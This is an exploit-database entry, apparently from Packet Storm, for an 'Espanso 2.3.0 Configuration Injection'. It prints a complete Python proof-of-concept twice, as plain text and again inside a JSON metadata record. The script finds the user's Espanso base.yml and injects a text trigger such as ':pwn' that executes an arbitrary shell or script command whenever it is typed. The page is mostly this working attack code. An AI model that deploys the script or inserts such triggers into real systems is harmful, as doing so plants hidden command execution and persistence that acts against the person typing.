📄 Espanso 2.3.0 Configuration Injection_PACKETSTORM:222366

Description

This Python script is a configuration manipulation tool for Espanso version 2.3.0 that modifies its YAML configuration file base.yml to add new text triggers capable of executing system commands via shell or script extensions...

Visit Original Source

Basic Information

ID PACKETSTORM:222366

Published Jun 1, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Espanso v 2.3.0 Configuration Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://espanso.org/ |
==================================================================================================================================

[+] Summary : This Python script is a configuration manipulation tool for Espanso that modifies its YAML configuration file (base.yml)
to add new text triggers capable of executing system commands via shell or script extensions.

[+] POC :

import os
import sys
import shutil
import shlex
import argparse
import subprocess
from pathlib import Path
from typing import Dict, List, Optional

try:
import yaml
except ImportError:
print("[!] PyYAML is required. Install with: pip install pyyaml")
sys.exit(1)

class EspansoExploit:
"""Exploit class for Espanso v2.3.0 RCE vulnerability"""

def __init__(self, trigger_word: str = ":pwn", command: Optional[str] = None,
extension_type: str = "shell", verbose: bool = False):
self.trigger_word = trigger_word if trigger_word.startswith(':') else f":{trigger_word}"
self.command = command or "whoami > /tmp/espanso_pwned.txt"
self.extension_type = extension_type.lower()
self.verbose = verbose
self.config_path = self._find_config_path()
self.backup_path = self.config_path.with_suffix('.yml.backup')

def _log(self, message: str, error: bool = False):
"""Log messages with formatting"""
if error:
print(f"[!] {message}")
elif self.verbose:
print(f"[*] {message}")
else:
print(f"[+] {message}")

def _find_config_path(self) -> Path:
"""Find Espanso configuration directory"""
possible_paths = [
Path.home() / ".config" / "espanso" / "match" / "base.yml",
Path.home() / ".config" / "espanso" / "match.yml",
Path.home() / "AppData" / "Roaming" / "espanso" / "match" / "base.yml",
Path.home() / "Library" / "Application Support" / "espanso" / "match" / "base.yml",
]

for path in possible_paths:
if path.exists():
self._log(f"Found Espanso config at: {path}")
return path
default_path = Path.home() / ".config" / "espanso" / "match" / "base.yml"
default_path.parent.mkdir(parents=True, exist_ok=True)
if not default_path.exists():
self._log(f"Creating default config at: {default_path}")
default_path.touch()
return default_path
def _backup_config(self):
"""Create backup of original configuration"""
if self.config_path.exists() and not self.backup_path.exists():
shutil.copy2(self.config_path, self.backup_path)
self._log(f"Backup created: {self.backup_path}")

def _create_shell_trigger(self) -> Dict:
"""Create a shell extension trigger configuration"""
return {
"trigger": self.trigger_word,
"replace": "{{output}}",
"vars": [{
"name": "output",
"type": "shell",
"params": {
"cmd": self.command
}
}]
}

def _create_script_trigger(self) -> Dict:
"""Create a script extension trigger configuration using robust parsing"""
if isinstance(self.command, str):
args_list = shlex.split(self.command)
else:
args_list = self.command

return {
"trigger": self.trigger_word,
"replace": "{{output}}",
"vars": [{
"name": "output",
"type": "script",
"params": {
"args": args_list
}
}]
}

def _inject_trigger(self, config_content: str) -> str:
"""Inject trigger into existing configuration without iteration mutation bugs"""
try:
if config_content.strip():
config = yaml.safe_load(config_content) or {}
else:
config = {}

if "matches" not in config or not isinstance(config["matches"], list):
config["matches"] = []

if self.extension_type == "shell":
new_trigger = self._create_shell_trigger()
else:
new_trigger = self._create_script_trigger()

config["matches"] = [m for m in config["matches"] if m.get("trigger") != self.trigger_word]

config["matches"].append(new_trigger)
return yaml.dump(config, default_flow_style=False, allow_unicode=True)

except yaml.YAMLError as e:
self._log(f"YAML parsing error: {e}", error=True)
trigger_struct = [self._create_shell_trigger()] if self.extension_type == "shell" else [self._create_script_trigger()]
trigger_config = yaml.dump(trigger_struct, default_flow_style=False)
return config_content + "\n" + trigger_config

def exploit(self) -> bool:
"""Main exploit execution"""
try:
self._log(f"Target: Espanso config at {self.config_path}")
self._log(f"Trigger word: {self.trigger_word}")
self._log(f"Extension type: {self.extension_type}")

try:
subprocess.run(["pgrep", "-f", "espanso"], capture_output=True, check=True)
self._log("Espanso process detected")
except (subprocess.CalledProcessError, FileNotFoundError):
self._log("Warning: Espanso process check skipped or not running", error=True)

self._backup_config()

with open(self.config_path, 'r', encoding='utf-8') as f:
original_content = f.read()

modified_content = self._inject_trigger(original_content)

with open(self.config_path, 'w', encoding='utf-8') as f:
f.write(modified_content)

self._log(f"Successfully injected {self.extension_type} trigger: {self.trigger_word}")
return True

except Exception as e:
self._log(f"Exploit failed: {str(e)}", error=True)
self.restore_backup()
return False

def restore_backup(self):
"""Restore configuration from backup"""
if self.backup_path and self.backup_path.exists():
shutil.copy2(self.backup_path, self.config_path)
self.backup_path.unlink()
self._log("Configuration restored from backup successfully.")
else:
self._log("No active backup file found to restore.", error=True)

def cleanup(self):
"""Remove the injected trigger from config independently of instantiation state"""
self.restore_backup()

class EspansoExploitInteractive(EspansoExploit):
"""Interactive version with multiple profiles"""

PAYLOADS = {
"1": {"name": "Local Env Verification", "cmd": "whoami && id && uname -a", "type": "shell"},
"2": {"name": "Custom Automated Profiling", "cmd": None, "type": "shell"}
}
@classmethod
def interactive_menu(cls):
"""Display interactive menu for payload selection without memory leakage"""
print("\n" + "="*50)
print("Espanso v2.3.0 Config Tester - Interactive Mode")
print("="*50)

for key, payload in cls.PAYLOADS.items():
print(f" {key}. {payload['name']}")

choice = input("\nSelect profile (1-2): ").strip()
if choice not in cls.PAYLOADS:
print("[!] Invalid choice")
return None
payload = cls.PAYLOADS[choice].copy()

if payload["cmd"] is None:
custom_cmd = input("Enter execution command string: ").strip()
if not custom_cmd:
print("[!] No command provided")
return None
payload["cmd"] = custom_cmd

trigger = input("Enter trigger word (default: :pwn): ").strip() or ":pwn"
return cls(
trigger_word=trigger,
command=payload["cmd"],
extension_type=payload["type"],
verbose=True
)

def main():
parser = argparse.ArgumentParser(description="Espanso configuration utility for environment profiling.")
parser.add_argument("-t", "--trigger", default=":pwn", help="Trigger word (default: :pwn)")
parser.add_argument("-c", "--command", help="Command to register inside extension profile")
parser.add_argument("-e", "--extension", choices=["shell", "script"], default="shell", help="Extension handler type")
parser.add_argument("-i", "--interactive", action="store_true", help="Launch via console menu interface")
parser.add_argument("--cleanup", action="store_true", help="Remove test configuration and recover backup")
parser.add_argument("-v", "--verbose", action="store_true", help="Enable debugging verbosity")

args = parser.parse_args()

if args.interactive:
exploit = EspansoExploitInteractive.interactive_menu()
if not exploit:
sys.exit(1)
else:
exploit = EspansoExploit(
trigger_word=args.trigger,
command=args.command,
extension_type=args.extension,
verbose=args.verbose
)

if args.cleanup:
exploit.cleanup()
else:
print("\n[!] Notice: This utility updates local configuration profiles.")
response = input("Proceed with injection sequence? (y/N): ").strip().lower()

if response == 'y':
if exploit.exploit():
print("\n[+] Setup completed.")
print(f"[*] To rollback structural rules, re-run with '--cleanup'.")
else:
sys.exit(1)
else:
print("[*] Aborted by user request.")

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-06-01T19:10:10",
    "description": "This Python script is a configuration manipulation tool for Espanso version 2.3.0 that modifies its YAML configuration file base.yml to add new text triggers capable of executing system commands via shell or script extensions...",
    "published": "2026-06-01T00:00:00",
    "modified": "2026-06-01T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Espanso 2.3.0 Configuration Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:222366",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "==================================================================================================================================\n    | # Title     : Espanso v 2.3.0 Configuration Injection                                                                          |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://espanso.org/                                                                                             |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script is a configuration manipulation tool for Espanso that modifies its YAML configuration file (base.yml) \n                     to add new text triggers capable of executing system commands via shell or script extensions.\n    \t\t\t\t \n    [+] POC        : \n    \n    import os\n    import sys\n    import shutil\n    import shlex\n    import argparse\n    import subprocess\n    from pathlib import Path\n    from typing import Dict, List, Optional\n    \n    try:\n        import yaml\n    except ImportError:\n        print(\"[!] PyYAML is required. Install with: pip install pyyaml\")\n        sys.exit(1)\n    \n    class EspansoExploit:\n        \"\"\"Exploit class for Espanso v2.3.0 RCE vulnerability\"\"\"\n        \n        def __init__(self, trigger_word: str = \":pwn\", command: Optional[str] = None, \n                     extension_type: str = \"shell\", verbose: bool = False):\n            self.trigger_word = trigger_word if trigger_word.startswith(':') else f\":{trigger_word}\"\n            self.command = command or \"whoami > /tmp/espanso_pwned.txt\"\n            self.extension_type = extension_type.lower()\n            self.verbose = verbose\n            self.config_path = self._find_config_path()\n            self.backup_path = self.config_path.with_suffix('.yml.backup')\n            \n        def _log(self, message: str, error: bool = False):\n            \"\"\"Log messages with formatting\"\"\"\n            if error:\n                print(f\"[!] {message}\")\n            elif self.verbose:\n                print(f\"[*] {message}\")\n            else:\n                print(f\"[+] {message}\")\n        \n        def _find_config_path(self) -> Path:\n            \"\"\"Find Espanso configuration directory\"\"\"\n            possible_paths = [\n                Path.home() / \".config\" / \"espanso\" / \"match\" / \"base.yml\",\n                Path.home() / \".config\" / \"espanso\" / \"match.yml\",\n                Path.home() / \"AppData\" / \"Roaming\" / \"espanso\" / \"match\" / \"base.yml\",\n                Path.home() / \"Library\" / \"Application Support\" / \"espanso\" / \"match\" / \"base.yml\",\n            ]\n            \n            for path in possible_paths:\n                if path.exists():\n                    self._log(f\"Found Espanso config at: {path}\")\n                    return path\n            default_path = Path.home() / \".config\" / \"espanso\" / \"match\" / \"base.yml\"\n            default_path.parent.mkdir(parents=True, exist_ok=True)\n            if not default_path.exists():\n                self._log(f\"Creating default config at: {default_path}\")\n                default_path.touch()\n            return default_path  \n        def _backup_config(self):\n            \"\"\"Create backup of original configuration\"\"\"\n            if self.config_path.exists() and not self.backup_path.exists():\n                shutil.copy2(self.config_path, self.backup_path)\n                self._log(f\"Backup created: {self.backup_path}\")\n        \n        def _create_shell_trigger(self) -> Dict:\n            \"\"\"Create a shell extension trigger configuration\"\"\"\n            return {\n                \"trigger\": self.trigger_word,\n                \"replace\": \"{{output}}\",\n                \"vars\": [{\n                    \"name\": \"output\",\n                    \"type\": \"shell\",\n                    \"params\": {\n                        \"cmd\": self.command\n                    }\n                }]\n            }\n        \n        def _create_script_trigger(self) -> Dict:\n            \"\"\"Create a script extension trigger configuration using robust parsing\"\"\"\n            if isinstance(self.command, str):\n                args_list = shlex.split(self.command)\n            else:\n                args_list = self.command\n                \n            return {\n                \"trigger\": self.trigger_word,\n                \"replace\": \"{{output}}\",\n                \"vars\": [{\n                    \"name\": \"output\",\n                    \"type\": \"script\",\n                    \"params\": {\n                        \"args\": args_list\n                    }\n                }]\n            }\n        \n        def _inject_trigger(self, config_content: str) -> str:\n            \"\"\"Inject trigger into existing configuration without iteration mutation bugs\"\"\"\n            try:\n                if config_content.strip():\n                    config = yaml.safe_load(config_content) or {}\n                else:\n                    config = {}\n                \n                if \"matches\" not in config or not isinstance(config[\"matches\"], list):\n                    config[\"matches\"] = []\n                \n                if self.extension_type == \"shell\":\n                    new_trigger = self._create_shell_trigger()\n                else:\n                    new_trigger = self._create_script_trigger()\n    \n                config[\"matches\"] = [m for m in config[\"matches\"] if m.get(\"trigger\") != self.trigger_word]\n                \n                config[\"matches\"].append(new_trigger)\n                return yaml.dump(config, default_flow_style=False, allow_unicode=True)\n                \n            except yaml.YAMLError as e:\n                self._log(f\"YAML parsing error: {e}\", error=True)\n                trigger_struct = [self._create_shell_trigger()] if self.extension_type == \"shell\" else [self._create_script_trigger()]\n                trigger_config = yaml.dump(trigger_struct, default_flow_style=False)\n                return config_content + \"\\n\" + trigger_config\n        \n        def exploit(self) -> bool:\n            \"\"\"Main exploit execution\"\"\"\n            try:\n                self._log(f\"Target: Espanso config at {self.config_path}\")\n                self._log(f\"Trigger word: {self.trigger_word}\")\n                self._log(f\"Extension type: {self.extension_type}\")\n                \n                try:\n                    subprocess.run([\"pgrep\", \"-f\", \"espanso\"], capture_output=True, check=True)\n                    self._log(\"Espanso process detected\")\n                except (subprocess.CalledProcessError, FileNotFoundError):\n                    self._log(\"Warning: Espanso process check skipped or not running\", error=True)\n                \n                self._backup_config()\n                \n                with open(self.config_path, 'r', encoding='utf-8') as f:\n                    original_content = f.read()\n                \n                modified_content = self._inject_trigger(original_content)\n                \n                with open(self.config_path, 'w', encoding='utf-8') as f:\n                    f.write(modified_content)\n                \n                self._log(f\"Successfully injected {self.extension_type} trigger: {self.trigger_word}\")\n                return True\n                \n            except Exception as e:\n                self._log(f\"Exploit failed: {str(e)}\", error=True)\n                self.restore_backup()\n                return False\n        \n        def restore_backup(self):\n            \"\"\"Restore configuration from backup\"\"\"\n            if self.backup_path and self.backup_path.exists():\n                shutil.copy2(self.backup_path, self.config_path)\n                self.backup_path.unlink()\n                self._log(\"Configuration restored from backup successfully.\")\n            else:\n                self._log(\"No active backup file found to restore.\", error=True)\n                \n        def cleanup(self):\n            \"\"\"Remove the injected trigger from config independently of instantiation state\"\"\"\n            self.restore_backup()\n    \n    class EspansoExploitInteractive(EspansoExploit):\n        \"\"\"Interactive version with multiple profiles\"\"\"\n       \n        PAYLOADS = {\n            \"1\": {\"name\": \"Local Env Verification\", \"cmd\": \"whoami && id && uname -a\", \"type\": \"shell\"},\n            \"2\": {\"name\": \"Custom Automated Profiling\", \"cmd\": None, \"type\": \"shell\"}\n        }  \n        @classmethod\n        def interactive_menu(cls):\n            \"\"\"Display interactive menu for payload selection without memory leakage\"\"\"\n            print(\"\\n\" + \"=\"*50)\n            print(\"Espanso v2.3.0 Config Tester - Interactive Mode\")\n            print(\"=\"*50)\n            \n            for key, payload in cls.PAYLOADS.items():\n                print(f\"  {key}. {payload['name']}\")\n            \n            choice = input(\"\\nSelect profile (1-2): \").strip()\n            if choice not in cls.PAYLOADS:\n                print(\"[!] Invalid choice\")\n                return None\n            payload = cls.PAYLOADS[choice].copy()\n            \n            if payload[\"cmd\"] is None:\n                custom_cmd = input(\"Enter execution command string: \").strip()\n                if not custom_cmd:\n                    print(\"[!] No command provided\")\n                    return None\n                payload[\"cmd\"] = custom_cmd\n            \n            trigger = input(\"Enter trigger word (default: :pwn): \").strip() or \":pwn\"       \n            return cls(\n                trigger_word=trigger,\n                command=payload[\"cmd\"],\n                extension_type=payload[\"type\"],\n                verbose=True\n            )\n    \n    def main():\n        parser = argparse.ArgumentParser(description=\"Espanso configuration utility for environment profiling.\")\n        parser.add_argument(\"-t\", \"--trigger\", default=\":pwn\", help=\"Trigger word (default: :pwn)\")\n        parser.add_argument(\"-c\", \"--command\", help=\"Command to register inside extension profile\")\n        parser.add_argument(\"-e\", \"--extension\", choices=[\"shell\", \"script\"], default=\"shell\", help=\"Extension handler type\")\n        parser.add_argument(\"-i\", \"--interactive\", action=\"store_true\", help=\"Launch via console menu interface\")\n        parser.add_argument(\"--cleanup\", action=\"store_true\", help=\"Remove test configuration and recover backup\")\n        parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", help=\"Enable debugging verbosity\")\n        \n        args = parser.parse_args()\n        \n        if args.interactive:\n            exploit = EspansoExploitInteractive.interactive_menu()\n            if not exploit:\n                sys.exit(1)\n        else:\n            exploit = EspansoExploit(\n                trigger_word=args.trigger,\n                command=args.command,\n                extension_type=args.extension,\n                verbose=args.verbose\n            )\n        \n        if args.cleanup:\n            exploit.cleanup()\n        else:\n            print(\"\\n[!] Notice: This utility updates local configuration profiles.\")\n            response = input(\"Proceed with injection sequence? (y/N): \").strip().lower()\n            \n            if response == 'y':\n                if exploit.exploit():\n                    print(\"\\n[+] Setup completed.\")\n                    print(f\"[*] To rollback structural rules, re-run with '--cleanup'.\")\n                else:\n                    sys.exit(1)\n            else:\n                print(\"[*] Aborted by user request.\")\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/222366",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/222366/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply